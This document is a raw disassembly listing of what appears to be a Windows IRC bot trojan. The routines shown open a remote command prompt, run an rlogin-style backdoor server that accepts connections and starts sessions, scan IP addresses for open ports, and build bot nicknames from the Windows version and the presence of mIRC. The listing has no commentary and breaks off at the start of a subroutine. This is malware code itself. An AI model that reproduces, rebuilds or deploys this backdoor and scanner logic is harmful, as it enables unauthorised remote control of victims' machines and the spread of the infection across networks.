lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], 1
mov [ebp+var_18], esi
call edi
test eax, eax
jz loc_412F5E
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi
test eax, eax
jz loc_412F5E
mov edi, ds:dword_494290
push 3
push esi
push esi
push offset dword_491D98
call edi
push eax
push [ebp+var_8]
call edi
push eax
call ds:dword_4943E4
test eax, eax
jz short loc_412F5E
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_4189A0
push 44h
lea eax, [ebp+var_74]
pop edi
push edi
push esi
push eax
call sub_4189A0
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
lea eax, [ebp+var_178]
push offset dword_491DE0
push eax
loc_412F49: ; DATA XREF: .data:off_442874�o
; .data:off_442878�o
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_494330
test eax, eax
jnz short loc_412F66
loc_412F5E: ; CODE XREF: sub_412E64+2E�j
; sub_412E64+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_413018
; ---------------------------------------------------------------------------
loc_412F66: ; CODE XREF: sub_412E64+F8�j
push [ebp+var_4]
mov edi, ds:dword_4942E0
call edi
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_491D94, eax
mov eax, [ebp+var_8]
mov dword_491D9C, eax
mov eax, [ebp+var_2C]
mov dword_491D90, eax
call edi
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov dword_491DD4, eax
jz short loc_412FA0
push [ebp+arg_4]
jmp short loc_412FA5
; ---------------------------------------------------------------------------
loc_412FA0: ; CODE XREF: sub_412E64+135�j
push offset dword_491DE4
loc_412FA5: ; CODE XREF: sub_412E64+13A�j
push offset dword_491DA0
call sub_418D70
pop ecx
pop ecx
push esi
push 7
push offset aCmdRemoteComma ; "[CMD]: Remote Command Prompt"
call sub_4161EB
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov dword_44D060[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_412D0F
push esi
push esi
call ds:dword_4942F4
cmp eax, esi
mov dword_44D06C[edi], eax
jnz short loc_413016
call ds:dword_4942F0
push eax
lea eax, [ebp+var_378]
push offset aCmdFailedToSta ; "[CMD]: Failed to start IO thread, error"...
push eax
call sub_418D70
lea eax, [ebp+var_378]
push eax
call sub_4035E1
add esp, 10h
loc_413016: ; CODE XREF: sub_412E64+189�j
xor eax, eax
loc_413018: ; CODE XREF: sub_412E64+FD�j
pop edi
pop esi
leave
retn
sub_412E64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41301C proc near ; DATA XREF: sub_4132AA+1BE�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
mov esi, eax
pop ecx
lea edi, [ebp+var_3D4]
push 1
mov [ebp+var_C], 1Eh
pop ebx
rep movsd
mov [eax+1DCh], ebx
mov eax, [ebp+var_208]
mov [ebp+arg_0], eax
imul eax, 234h
lea esi, dword_44D064[eax]
xor edi, edi
mov [ebp+var_8], edi
mov [ebp+var_1F4], ebx
mov eax, [esi]
mov [ebp+var_1F0], eax
lea eax, [ebp+var_C]
push eax
push edi
lea eax, [ebp+var_1F4]
push edi
push eax
push edi
call dword_44B6A8 ; select
test eax, eax
jnz short loc_4130A0
push dword ptr [esi]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call sub_416507
pop ecx
push edi
call ds:dword_4942FC
loc_4130A0: ; CODE XREF: sub_41301C+6A�j
push edi
lea eax, [ebp+var_3C]
push ebx
push eax
push dword ptr [esi]
call dword_44B6D8 ; recv
lea eax, [ebp+var_2C]
push 10h
push eax
push dword ptr [esi]
call sub_413221
lea eax, [ebp+var_4C]
push 10h
push eax
push dword ptr [esi]
call sub_413221
lea eax, [ebp+var_F0]
push 40h
push eax
push dword ptr [esi]
call sub_413221
add esp, 24h
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_1C]
push eax
push dword ptr [esi]
call dword_44B61C ; getpeername
test eax, eax
jz short loc_413119
call dword_44B654 ; WSAGetLastError
push eax
push offset aRlogindErrorGe ; "[RLOGIND]: Error: getpeername(): <%d>."
call sub_403655
push [ebp+arg_0]
call sub_416507
add esp, 0Ch
push edi
call ds:dword_4942FC
loc_413119: ; CODE XREF: sub_41301C+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call dword_44B678 ; gethostbyaddr
cmp eax, edi
jnz short loc_413143
push [ebp+var_18]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_B0]
push eax
call sub_418D70
jmp short loc_413151
; ---------------------------------------------------------------------------
loc_413143: ; CODE XREF: sub_41301C+10D�j
push dword ptr [eax]
lea eax, [ebp+var_B0]
push eax
call sub_419FA0
loc_413151: ; CODE XREF: sub_41301C+125�j
pop ecx
pop ecx
push edi
push ebx
push offset dword_491DF8
push dword ptr [esi]
call dword_44B710 ; send
cmp dword_491DF0, edi
jnz short loc_4131B3
push [ebp+var_18]
lea eax, [ebp+var_350]
push eax
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_41327B
add esp, 10h
test eax, eax
jnz short loc_4131B3
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call dword_44B710 ; send
push dword ptr [esi]
call dword_44B758 ; closesocket
push [ebp+arg_0]
call sub_416507
pop ecx
push edi
call ds:dword_4942FC
loc_4131B3: ; CODE XREF: sub_41301C+14C�j
; sub_41301C+16D�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset aRlogindUserLog ; "[RLOGIND]: User logged in: <%s@%s>."
call sub_403655
push [ebp+arg_0]
call sub_41416C
add esp, 10h
test eax, eax
jnz short loc_4131FA
call ds:dword_4942F0
push eax
push offset aRlogindErrorSe ; "[RLOGIND]: Error: SessionRun(): <%d>."
call sub_403655
push [ebp+arg_0]
call sub_416507
add esp, 0Ch
push ebx
call ds:dword_4942FC
loc_4131FA: ; CODE XREF: sub_41301C+1B9�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset aRlogindUserL_0 ; "[RLOGIND]: User logged out: <%s@%s>."
call sub_403655
push [ebp+arg_0]
call sub_416507
add esp, 10h
push edi
call ds:dword_4942FC
sub_41301C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413221 proc near ; CODE XREF: sub_41301C+9A�p
; sub_41301C+A7�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_44B6D8 ; recv
cmp eax, 1
jnz short loc_413271
mov esi, [ebp+arg_4]
loc_41323F: ; CODE XREF: sub_413221+41�j
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_413266
test al, al
jz short loc_413275
push 0
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call dword_44B6D8 ; recv
cmp eax, 1
jz short loc_41323F
jmp short loc_413271
; ---------------------------------------------------------------------------
loc_413266: ; CODE XREF: sub_413221+27�j
push offset aRlogindProtoco ; "[RLOGIND]: Protocol string too long."
call sub_403655
pop ecx
loc_413271: ; CODE XREF: sub_413221+19�j
; sub_413221+43�j
xor eax, eax
jmp short loc_413278
; ---------------------------------------------------------------------------
loc_413275: ; CODE XREF: sub_413221+2B�j
push 1
pop eax
loc_413278: ; CODE XREF: sub_413221+52�j
pop esi
leave
retn
sub_413221 endp
; =============== S U B R O U T I N E =======================================
sub_41327B proc near ; CODE XREF: sub_41301C+163�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_0]
push [esp+4+arg_8]
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_4132A6
push [esp+arg_4]
push [esp+4+arg_0]
push offset aRlogindLoginRe ; "[RLOGIND]: Login rejected, Remote user:"...
call sub_403655
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4132A6: ; CODE XREF: sub_41327B+11�j
push 1
pop eax
retn
sub_41327B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4132AA proc near ; DATA XREF: sub_40C50A+561E�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
push 1
rep movsd
pop edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call dword_44B638 ; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_413303
push eax
push offset aRlogindErrorWs ; "[RLOGIND]: Error: WSAStartup(): <%d>."
call sub_403655
push [ebp+var_4C]
call sub_416507
add esp, 0Ch
push edi
call ds:dword_4942FC
loc_413303: ; CODE XREF: sub_4132AA+3A�j
push edi
push offset loc_413528
call ds:dword_4943EC
test eax, eax
jnz short loc_41333C
call ds:dword_4942F0
push eax
push offset aRlogindFaile_0 ; "[RLOGIND]: Failed to install control-C "...
call sub_403655
pop ecx
pop ecx
call dword_44B620 ; WSACleanup
push [ebp+var_4C]
call sub_416507
pop ecx
push edi
call ds:dword_4942FC
loc_41333C: ; CODE XREF: sub_4132AA+67�j
push ebx
push 10h
lea eax, [ebp+var_20]
push esi
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_20], 2
push [ebp+var_50]
call dword_44B6C0 ; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call dword_44B740 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_4134B3
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov dword_44D064[eax], ebx
lea eax, [ebp+var_20]
push eax
push ebx
call dword_44B6EC ; bind
test eax, eax
jnz loc_4134B3
push 7FFFFFFFh
push ebx
call dword_44B6E8 ; listen
test eax, eax
jnz loc_4134B3
push offset aRlogindReadyAn ; "[RLOGIND]: Ready and waiting for incomi"...
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_4035E1
pop ecx
mov [ebp+arg_0], edi
loc_4133CB: ; CODE XREF: sub_4132AA+15A�j
; sub_4132AA+1E4�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call dword_44B754 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_4134B6
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call dword_44B6A0 ; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_4133CB
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_414]
push offset aRlogindClientC ; "[RLOGIND]: Client connection from IP: %"...
push eax
call sub_418D70
lea eax, [ebp+var_414]
push eax
call sub_4035E1
push edi
lea eax, [ebp+var_414]
push 6
push eax
call sub_4161EB
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov dword_44D05C[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_41301C
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_4942F4
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov dword_44D06C[ecx], eax
jz short loc_41349E
loc_41348B: ; CODE XREF: sub_4132AA+1F2�j
cmp [ebp+var_38], esi
jnz loc_4133CB
push 32h
call ds:dword_4942D8
jmp short loc_41348B
; ---------------------------------------------------------------------------
loc_41349E: ; CODE XREF: sub_4132AA+1DF�j
call ds:dword_4942F0
push eax
push offset aRlogindFaile_1 ; "[RLOGIND]: Failed to start client threa"...
call sub_403655
pop ecx
pop ecx
jmp short loc_4134B6
; ---------------------------------------------------------------------------
loc_4134B3: ; CODE XREF: sub_4132AA+C8�j
; sub_4132AA+EC�j ...
mov edi, [ebp+arg_0]
loc_4134B6: ; CODE XREF: sub_4132AA+13C�j
; sub_4132AA+207�j
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_414]
push offset aRlogindError_0 ; "[RLOGIND]: Error: server failed, return"...
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_4134F6
push esi
lea eax, [ebp+var_414]
push [ebp+var_40]
push eax
lea eax, [ebp+var_210]
push eax
push [ebp+var_214]
call sub_40842D
add esp, 14h
loc_4134F6: ; CODE XREF: sub_4132AA+22A�j
lea eax, [ebp+var_414]
push eax
call sub_4035E1
pop ecx
push edi
call dword_44B758 ; closesocket
push ebx
call dword_44B758 ; closesocket
call dword_44B620 ; WSACleanup
push [ebp+var_4C]
call sub_416507
pop ecx
push esi
call ds:dword_4942FC
pop ebx
loc_413528: ; DATA XREF: sub_4132AA+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_4132AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_413532 proc near ; CODE XREF: sub_4138AA+49�p
; DATA XREF: .data:off_441CD0�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_494308
push eax
call sub_418FF0
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aFf_2 ; "[FF]-"
push offset dword_441D24
push 1Ch
push edi
call sub_418EF0
xor esi, esi
add esp, 10h
cmp dword_43E1BC, esi
jle short loc_41358B
loc_413565: ; CODE XREF: sub_413532+57�j
call sub_419000
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_2 ; "%s%i"
push 1Ch
push edi
call sub_418EF0
add esp, 14h
inc esi
cmp esi, dword_43E1BC
jl short loc_413565
loc_41358B: ; CODE XREF: sub_413532+31�j
mov eax, edi
pop edi
pop esi
retn
sub_413532 endp
; =============== S U B R O U T I N E =======================================
sub_413590 proc near ; CODE XREF: sub_40C50A+3E7F�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_494308
push eax
call sub_418FF0
pop ecx
call sub_419000
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_43E1BC
test esi, esi
jle short loc_4135D3
loc_4135BD: ; CODE XREF: sub_413590+41�j
call sub_419000
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_4135BD
loc_4135D3: ; CODE XREF: sub_413590+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_413590 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, offset aPc ; "PC"
mov dword ptr [ebp-4], 100h
xor edi, edi
call ds:dword_494308
push eax
call sub_418FF0
pop ecx
lea eax, [ebp-4]
push eax
push esi
call ds:dword_4943B4
test eax, eax
jnz short loc_413612
mov esi, offset aPc_0 ; "PC"
loc_413612: ; CODE XREF: .text:0041360B�j
movsx eax, byte ptr [esi]
push 41h
pop ecx
loc_413618: ; CODE XREF: .text:00413623�j
cmp eax, ecx
jnz short loc_41361F
push 1
pop edi
loc_41361F: ; CODE XREF: .text:0041361A�j
inc ecx
cmp ecx, 5Bh
jl short loc_413618
push 61h
pop ecx
loc_413628: ; CODE XREF: .text:00413633�j
cmp eax, ecx
jnz short loc_41362F
push 1
pop edi
loc_41362F: ; CODE XREF: .text:0041362A�j
inc ecx
cmp ecx, 7Bh
jl short loc_413628
test edi, edi
jnz short loc_41363E
mov esi, offset aPc_1 ; "PC"
loc_41363E: ; CODE XREF: .text:00413637�j
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_418EF0
xor esi, esi
add esp, 0Ch
cmp dword_43E1BC, esi
jle short loc_41367D
loc_413657: ; CODE XREF: .text:0041367B�j
call sub_419000
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_418EF0
add esp, 14h
inc esi
cmp esi, dword_43E1BC
jl short loc_413657
loc_41367D: ; CODE XREF: .text:00413655�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_494308
push eax
call sub_418FF0
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call ds:dword_4943F0
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aS_32 ; "%s|"
push 1Ch
push edi
call sub_418EF0
xor esi, esi
add esp, 10h
cmp dword_43E1BC, esi
jle short loc_4136F2
loc_4136CC: ; CODE XREF: .text:004136F0�j
call sub_419000
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_0 ; "%s%i"
push 1Ch
push edi
call sub_418EF0
add esp, 14h
inc esi
cmp esi, dword_43E1BC
jl short loc_4136CC
loc_4136F2: ; CODE XREF: .text:004136CA�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset dword_491E00
mov dword ptr [ebp-94h], 94h
call ds:dword_4943F4
call ds:dword_494308
push eax
call sub_418FF0
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_41377C
cmp dword ptr [ebp-8Ch], 0
jnz short loc_41375C
cmp dword ptr [ebp-84h], 1
jnz short loc_41374C
mov esi, offset a95 ; "95"
loc_41374C: ; CODE XREF: .text:00413745�j
cmp dword ptr [ebp-84h], 2
jnz short loc_4137B8
mov esi, offset aNt ; "NT"
jmp short loc_4137B8
; ---------------------------------------------------------------------------
loc_41375C: ; CODE XREF: .text:0041373C�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_41376C
mov esi, offset a98 ; "98"
jmp short loc_4137B8
; ---------------------------------------------------------------------------
loc_41376C: ; CODE XREF: .text:00413763�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_4137B3
mov esi, offset aMe_0 ; "ME"
jmp short loc_4137B8
; ---------------------------------------------------------------------------
loc_41377C: ; CODE XREF: .text:00413733�j
cmp dword ptr [ebp-90h], 5
jnz short loc_4137B3
cmp dword ptr [ebp-8Ch], 0
jnz short loc_413795
mov esi, offset a2k ; "2K"
jmp short loc_4137B8
; ---------------------------------------------------------------------------
loc_413795: ; CODE XREF: .text:0041378C�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_4137A5
mov esi, offset aXp ; "XP"
jmp short loc_4137B8
; ---------------------------------------------------------------------------
loc_4137A5: ; CODE XREF: .text:0041379C�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_4137B8
loc_4137B3: ; CODE XREF: .text:00413773�j
; .text:00413783�j
mov esi, offset a??? ; "???"
loc_4137B8: ; CODE XREF: .text:00413753�j
; .text:0041375A�j ...
mov edi, [ebp+8]
push esi
push offset aS_33 ; "[%s]|"
push 1Ch
push edi
call sub_418EF0
xor esi, esi
add esp, 10h
cmp dword_43E1BC, esi
jle short loc_4137FC
loc_4137D6: ; CODE XREF: .text:004137FA�j
call sub_419000
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_1 ; "%s%i"
push 1Ch
push edi
call sub_418EF0
add esp, 14h
inc esi
cmp esi, dword_43E1BC
jl short loc_4137D6
loc_4137FC: ; CODE XREF: .text:004137D4�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413802 proc near ; CODE XREF: sub_4138AA+5C�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_494308
xor edx, edx
mov ecx, 337F9800h
div ecx
push 0
mov esi, eax
cmp esi, 0Ah
jbe short loc_413851
push offset aMirc_2 ; "mIRC"
call dword_44B6CC ; FindWindowA
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_41383A
mov eax, offset dword_491E04
loc_41383A: ; CODE XREF: sub_413802+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_418EF0
add esp, 14h
jmp short loc_413876
; ---------------------------------------------------------------------------
loc_413851: ; CODE XREF: sub_413802+1D�j
push offset aMirc_3 ; "mIRC"
call dword_44B6CC ; FindWindowA
test eax, eax
mov eax, offset aM_1 ; "[M]"
jnz short loc_41386A
mov eax, offset dword_491E08
loc_41386A: ; CODE XREF: sub_413802+61�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_418D70
pop ecx
pop ecx
loc_413876: ; CODE XREF: sub_413802+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_418E70
pop ecx
cmp eax, 2
pop esi
jbe short loc_4138A5
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_419040
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_4191A0
add esp, 18h
loc_4138A5: ; CODE XREF: sub_413802+82�j
mov eax, [ebp+arg_0]
leave
retn
sub_413802 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4138AA proc near ; CODE XREF: sub_40823C+10D�p
; sub_40C22A+7F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_441CCC
loc_4138B6: ; CODE XREF: sub_4138AA+3F�j
cmp [ebp+arg_C], 0
jz short loc_4138D1
lea eax, [esi-0Ch]
push eax
push [ebp+arg_C]
call sub_419360
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_4138DB
; ---------------------------------------------------------------------------
loc_4138D1: ; CODE XREF: sub_4138AA+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_4138DB: ; CODE XREF: sub_4138AA+25�j
test eax, eax
jnz short loc_4138ED
add esi, 14h
inc edi
cmp esi, offset aPc ; "PC"
jl short loc_4138B6
jmp short loc_4138FB
; ---------------------------------------------------------------------------
loc_4138ED: ; CODE XREF: sub_4138AA+33�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call off_441CD0[eax*4]
pop ecx
loc_4138FB: ; CODE XREF: sub_4138AA+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_41390E
push [ebp+arg_0]
call sub_413802
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41390E: ; CODE XREF: sub_4138AA+57�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_4138AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413913 proc near ; DATA XREF: sub_4139E0+7B�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B8h
mov eax, [ebp+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_B8]
push 1
rep movsd
pop esi
mov [eax+0A4h], esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_34]
call dword_44B6C0 ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call dword_44B740 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4139D1
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_44B668 ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_44D064[ecx], esi
jz short loc_4139D1
push [ebp+var_34]
push [ebp+var_28]
call dword_44B74C ; inet_ntoa
push eax
mov edi, offset dword_491E0C
push offset aScanIpSPortD_0 ; "[SCAN]: IP: %s Port: %d is open."
push edi
call sub_418D70
push 0
lea eax, [ebp+var_B4]
push [ebp+var_20]
push edi
push eax
push [ebp+var_B8]
call sub_40842D
push edi
call sub_4035E1
add esp, 28h
loc_4139D1: ; CODE XREF: sub_413913+5D�j
; sub_413913+7E�j
push esi
call dword_44B758 ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_413913 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4139E0 proc near ; DATA XREF: sub_40C50A+35ED�o
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Ah
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_4942D8
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_413A0E: ; CODE XREF: sub_4139E0+EC�j
push [ebp+var_2C]
push [ebp+var_20]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset aScanScanningIp ; "[SCAN]: Scanning IP: %s, Port: %d."
push eax
call sub_418D70
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_44CE58
push eax
call sub_4191A0
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_413913
push edi
push edi
call ds:dword_4942F4
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_413A7A
loc_413A6F: ; CODE XREF: sub_4139E0+98�j
cmp [ebp+var_C], edi
jnz short loc_413A7A
push 32h
call esi
jmp short loc_413A6F
; ---------------------------------------------------------------------------
loc_413A7A: ; CODE XREF: sub_4139E0+8D�j
; sub_4139E0+92�j
push [ebp+var_4]
call ds:dword_4942E0
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi
lea eax, [ebp+var_20]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_418A00
add esp, 0Ch
push [ebp+arg_0]
call dword_44B5F4 ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_44B6BC ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_418A00
add esp, 0Ch
jmp loc_413A0E
sub_4139E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AD1 proc near ; DATA XREF: sub_40C50A+5F81�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_413B18
call sub_413B31
jmp short loc_413B1D
; ---------------------------------------------------------------------------
loc_413B18: ; CODE XREF: sub_413AD1+3E�j
call sub_413E55
loc_413B1D: ; CODE XREF: sub_413AD1+45�j
add esp, 10h
push [ebp+var_14]
call sub_416507
pop ecx
push 0
call ds:dword_4942FC
sub_413AD1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413B31 proc near ; CODE XREF: sub_413AD1+40�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
